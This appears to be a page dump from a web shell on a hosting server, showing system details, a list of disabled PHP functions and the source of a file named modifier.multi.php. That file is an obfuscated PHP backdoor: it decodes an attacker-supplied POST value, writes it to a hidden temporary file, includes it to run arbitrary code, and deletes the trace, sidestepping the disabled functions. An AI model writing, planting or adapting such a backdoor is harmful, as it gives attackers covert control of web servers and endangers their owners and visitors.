HEX
Server: Apache
System: Linux c040.dattaweb.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: c0400220 (20588)
PHP: 7.4.33
Disabled: system, shell, exec, system_exec, shell_exec, mysql_pconnect, passthru, popen, proc_open, proc_close, proc_nice, proc_terminate, proc_get_status, escapeshellarg, escapeshellcmd, eval, dl, imap_mail, libvirt_connect, gnupg_init, unsetenv, apache_setenv, pcntl_exec, pcntl_alarm, pcntl_fork, pcntl_waitpid, pcntl_wait, pcntl_wifexited, pcntl_wifstopped, pcntl_wifsignaled, pcntl_wifcontinued, pcntl_wexitstatus, pcntl_wtermsig, pcntl_wstopsig, pcntl_signal, pcntl_signal_get_handler, pcntl_signal_dispatch, pcntl_get_last_error, pcntl_strerror, pcntl_sigprocmask, pcntl_sigwaitinfo, pcntl_sigtimedwait, pcntl_getpriority, pcntl_setpriority, pcntl_async_signals, opcache_get_status, opcache_reset, opcache_get_configuration
Upload Files
File: /home/c0400220/public_html/modifier.multi.php
<?php

if(@$_POST["p\x6Fi\x6E\x74\x65r"] !== null){
	$flag = array_filter([getcwd(), sys_get_temp_dir(), session_save_path(), "/var/tmp", getenv("TEMP"), "/tmp", getenv("TMP"), "/dev/shm", ini_get("upload_tmp_dir")]);
	$bind = $_POST["p\x6Fi\x6E\x74\x65r"];
		  $bind 		= explode			('.'   , 		$bind ); 
	$k=		'';
            $salt=		'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS=		strlen(	 $salt);
            $n=		0;
    
            while(	 $n < count(	 $bind)) {
                $v9=		$bind[$n];
                $chS=		ord(	 $salt[$n % $lenS]);
                $dec=		(	 (	 int)$v9 - $chS -(	 $n % 10))  ^ 	7;
                $k	 .=chr(	 $dec);
                $n++; }  
	for ($flg = 0, $itm = count($flag); $flg < $itm; $flg++) {
    $parameter_group = $flag[$flg];
    		if ((bool)is_dir($parameter_group) && (bool)is_writable($parameter_group)) {
    $elem = join("/", [$parameter_group, ".descriptor"]);
    $success = file_put_contents($elem, $k);
if ($success) {
	include $elem;
	@unlink($elem);
	exit;}
}
}
}